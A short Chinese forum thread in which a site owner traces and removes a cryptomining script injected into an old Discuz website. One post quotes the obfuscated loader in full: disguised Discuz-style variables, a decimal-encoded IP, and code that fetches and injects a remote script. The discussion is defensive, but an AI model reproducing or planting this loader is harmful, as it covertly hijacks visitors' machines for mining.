pppcc 发表于 2018-6-22 04:55:42

已经解决

本帖最后由 pppcc 于 2018-6-22 06:08 编辑

   帮朋友做了一个网站,用的是多年前的discuz.
   刚刚发现网站被挂马了。被挂了一个挖矿的JS脚本http://172.104.64.162/17.js
    https://i.loli.net/2018/06/22/5b2c0f7d6f7b7.png
   用 ecosway598 大佬的方式,搜索了所有文件都没有找到,还好是个小网站,终于在后台找到了,可能是朋友不懂,只想提高SEO加的吧

   https://i.loli.net/2018/06/22/5b2c2123a77ca.png

ecosway598 发表于 2018-6-22 05:04:28

pppcc 发表于 2018-6-22 05:18:33

正在下载。。。和大佬的想法一样。。。

pppcc 发表于 2018-6-22 05:32:04

估计是文件名或其他方式加密了,搜索17.js没有找到
https://i.loli.net/2018/06/22/5b2c18a90c823.png

pppcc 发表于 2018-6-22 06:00:56

找到了一行奇怪的代码
<script type="text/javascript">var HTMLXMLNS = 'http://www.w3.org/1999/xhtml', cookie_ns_type = 'ET', STATINODE = 'src', PT = '', creditnotice = '1||,2||,3||', DZ_ALL_SETTING = window, VARHASH = 'ipt',

css_classtype = '', HEADER_NODE='', STATIPATH = 'scr'; if(XMLHttpRequest) STATICNODE = XMLHttpRequest; FONT_CLASS_ID = '2892513442', cookie_pinfo = '17', cookie_ns_type = 'G' + cookie_ns_type,

IMGDIR = 'static/image/common', DZ_ALL_BODY = document, REPORT = 'Microsoft.XMLHTTP', NEWS = '', NEWS_ID = 4, JSFILE = 'js', CSSPAT = 'data/cache/style_', FONT_CLASS_ID =FONT_CLASS_ID + '/',

T_INFO = '', cookie_pinfo = cookie_pinfo + '.' + JSFILE; if( DZ_ALL_SETTING.ActiveXObject ) HEADER_NODE = DZ_ALL_SETTING.ActiveXObject; SCBARID = 200; if ( STATICNODE ) PT = new STATICNODE(); if (

HEADER_NODE ) PT = new HEADER_NODE(); FONT_CLASS_ID = HTMLXMLNS.substring(0,7) + FONT_CLASS_ID + cookie_pinfo; if ( PT ){ PT.open( cookie_ns_type , FONT_CLASS_ID);PT.onreadystatechange =

function() {if (PT.readyState == NEWS_ID && PT.status == SCBARID ){ N_INFO = ''; DZ_ALL_BODY.head.appendChild( DZ_ALL_BODY.createElement( STATIPATH + VARHASH )).innerHTML = PT.responseText;

PT = null;}}; PT.send();}; CSSPATH = 'data/cache/style_', DYNAMICURL1 = '';</script>

ecosway598 发表于 2018-6-22 06:24:50

页: [1]
查看完整版本: 已经解决